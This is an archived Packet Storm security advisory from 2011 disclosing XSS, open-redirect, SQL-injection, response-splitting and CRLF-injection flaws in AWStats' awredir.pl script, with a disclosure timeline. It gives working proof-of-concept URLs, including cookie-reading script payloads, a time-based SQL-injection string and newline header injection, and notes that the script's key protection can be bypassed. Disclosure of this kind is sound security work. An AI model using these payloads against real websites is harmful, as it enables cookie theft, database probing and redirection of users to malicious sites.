exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AWStats 7.0 / 6.0 SQL Injection / Cross Site Scripting / CRLF Injection

AWStats 7.0 / 6.0 SQL Injection / Cross Site Scripting / CRLF Injection
Posted Sep 23, 2011
Authored by MustLive

AWStats versions 6.0 and 7.0 suffers from CRLF injection, cross site scripting, HTTP response splitting, and remote SQL injection vulnerabilities.

tags | exploit, remote, web, vulnerability, xss, sql injection
SHA-256 | 59557071b1987b2fde0f1594bff019d2392bfda8e3b64f00a2219e1a52209747

AWStats 7.0 / 6.0 SQL Injection / Cross Site Scripting / CRLF Injection

Change Mirror Download
Hello list!

I want to warn you about multiple security vulnerabilities in AWStats.

These are Cross-Site Scripting, Redirector, SQL Injection, HTTP Response
Splitting and CRLF Injection vulnerabilities in AWStats (in awredir).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of AWStats (6.0, 7.0 and previous versions).

----------
Details:
----------

AWStats includes script Advanced Web Redirector (awredir.pl). There were
already found (by trev and tx) XSS and Redirector vulnerabilities in
awredir.pl in 2008 (http://sla.ckers.org/forum/read.php?3,23620). They have
not mentioned about SQL Injection, maybe it was due to that affected
functionality of the script was turned off by default.

As I found, version awredir 1.1 (build 1.5) was not vulnerable to XSS, but
version 1.1 (build 1.6) was already vulnerable.

There are XSS, Redirector and SQL Injection vulnerabilities in version 1.1
of the script. And in version 1.2 the protection was added - parameter key.
Which can even be not used (if $KEYFORMD5 is empty), or it can be revealed
by picking up. So the protection with key is not sufficient and can be
bypassed. The parameter key will be needed for version 1.2 for conducting of
Redirector, SQL Injection, HTTP Response Splitting and CRLF Injection
attacks.

In version 1.2 XSS was fixed, but Redirector and SQLi holes were left and
HTTPRS, CRLF Injection and two new XSS were added.

XSS (WASC-08) (in versions <=1.1):

http://site/awredir.pl?url=javascript:alert(document.cookie)

Redirector (URL Redirector Abuse in WASC 2.0) (WASC-38):

http://site/awredir.pl?url=http://websecurity.com.ua

In version 1.2:

http://site/awredir.pl?key=0f3830803a70cc1636af3548b66ed978&url=http://websecurity.com.ua

SQL Injection (WASC-19):

http://site/awredir.pl?url='%20and%20benchmark(10000,md5(now()))/*

In version 1.2:

http://site/awredir.pl?key=f38ed1cdb04c8bda5386f7755a4e1d3e&url='%20and%20benchmark(10000,md5(now()))/*

SQL Injection attack is possible if $TRACEBASE is turned on and DBI is
included.

XSS (WASC-08) (in version 1.2):

http://site/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

HTTP Response Splitting (WASC-25):

http://site/awredir.pl?key=04ed5362e853c72ca275818a7c0c5857&url=%0AHeader:1

CRLF Injection (Improper Input Handling in WASC 2.0) (WASC-20):

http://site/awredir.pl?key=4b9faa91e2529400c4f3c70833b4e4a5&url=%0AText

CRLF Injection in logs is possible at turned on $DEBUG and/or $TRACEFILE.

------------
Timeline:
------------

2008.07.22 - after informing developers, trev and tx disclosed XSS and
Redirector holes. After which developers should fixed them correctly (and
also SQLi) and without adding new holes.
2011.09.17 - informed developers.
2011.09.22 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5380/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close